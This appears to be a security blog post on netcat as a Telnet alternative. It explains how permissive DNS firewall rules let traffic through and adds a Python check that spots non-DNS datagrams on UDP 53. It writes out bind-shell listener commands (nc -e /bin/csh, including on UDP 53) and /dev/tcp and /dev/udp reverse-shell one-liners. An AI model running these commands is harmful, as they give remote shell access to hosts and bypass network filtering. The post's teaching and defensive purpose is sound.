- Faster than a speeding Telnet.
- Easy to drop with a CTRL-C
- Handles raw data in a single bound
Yes, it's not a bird or a plane, it is netcat.
Netcat is far faster than Telnet, since it carries none of Telnet's protocol overhead and character translation. This makes it superior for forensic data transfers: unlike Telnet, netcat does not add characters to the stream.
Next, netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server - even over UDP.
On the Server:
# nc -l -p [port] -e /bin/csh
C:\ nc -l -p [port] -e C:\windows\cmd.exe
So if the aim is to have a UDP "telnet"-style listener on UDP 53, just run:
# nc -l -u -p 53 -e /bin/csh
Can we say "simple backdoor"?
On the Client:
# nc [ServerIPAddress] [port]
So to connect to the listener above on UDP 53 at IP address 192.168.10.123 we would use:
# nc -u 192.168.10.123 53
It is all really easy when you think about it. This is why it is SO EASY to bypass firewalls and routers that allow DNS traffic (or any default rules): the filter sees UDP 53 and lets it through without looking at whether the payload is actually DNS. This is why it is CRITICAL that there are restrictions on all rules that allow ANY system to ANY system access.
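As an added example (not part of the original post), here is a small Python check a defender can run over datagrams captured on UDP/53 to tell real DNS queries from arbitrary data, such as the netcat "telnet" session above. It assumes the UDP payloads have already been extracted from a capture in the client-to-resolver direction; the three sample datagrams in the code are constructed for the demonstration.

```python
import struct


def build_query(name, txid=0x1234):
    """Build a minimal standard DNS query (QTYPE=A, QCLASS=IN) for name."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


# Constructed sample payloads seen on UDP port 53 (made-up test input): one real
# DNS query plus two plain-text datagrams of the kind a netcat "telnet" session
# over UDP 53 produces.
SAMPLE_DATAGRAMS = [
    build_query("example.com"),
    b"hello over udp 53 from nc\n",
    b"uid=1000(user) gid=1000(user)\n",
]


def parse_dns_name(payload, offset):
    """Walk DNS labels starting at offset; return (name, next_offset) or None if malformed."""
    labels = []
    while True:
        if offset >= len(payload):
            return None
        length = payload[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers never appear in a plain question name
            return None
        if length > 63 or offset + length > len(payload):
            return None
        label = payload[offset:offset + length]
        try:
            labels.append(label.decode("ascii"))
        except UnicodeDecodeError:
            return None
        offset += length
    return ".".join(labels), offset


def looks_like_dns_query(payload):
    """Return True if the datagram parses as a plausible client DNS query."""
    if len(payload) < 12:
        return False  # shorter than a DNS header
    txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
    qr = flags >> 15
    opcode = (flags >> 11) & 0xF
    if qr != 0 or opcode not in (0, 1, 2):  # QR must be 0 for a query; opcodes 3+ are unused
        return False
    if qdcount != 1 or ancount != 0 or nscount != 0:
        return False  # a client query carries exactly one question and no answers
    parsed = parse_dns_name(payload, 12)
    if parsed is None:
        return False
    _, offset = parsed
    if offset + 4 > len(payload):
        return False  # QTYPE/QCLASS missing after the name
    _qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
    return qclass == 1  # IN class


def flag_non_dns(datagrams):
    """Indices of datagrams that fail the DNS query check; these deserve a closer look."""
    return [i for i, d in enumerate(datagrams) if not looks_like_dns_query(d)]


if __name__ == "__main__":
    for i in flag_non_dns(SAMPLE_DATAGRAMS):
        print(f"datagram {i}: not a DNS query: {SAMPLE_DATAGRAMS[i][:32]!r}")
```

The check is deliberately strict about the header rather than trying to parse every record type: a UDP 53 rule that only admits datagrams with a well-formed query header already stops a plain netcat listener from answering, and the same test can be folded into a packet capture review to spot "DNS" that carries no DNS.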
Oops - I forgot to install netcat...
More on this later, but when we need a netcat-style client on a system where netcat cannot be installed, there are /dev/tcp and /dev/udp. These are pseudo-devices implemented inside bash rather than real files, so the redirection has to be evaluated by bash.
For the shell this becomes:
- /bin/csh -i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
- /bin/csh -i > /dev/udp/[IPaddress]/[port] 0<&1 2>&1
So for our UDP 53 example this becomes:
- /bin/csh -i > /dev/udp/192.168.10.123/53 0<&1 2>&1
This shovels a shell from the target host to the waiting netcat listener: commands typed at the listener run on the target host, which is what makes it a reverse shell.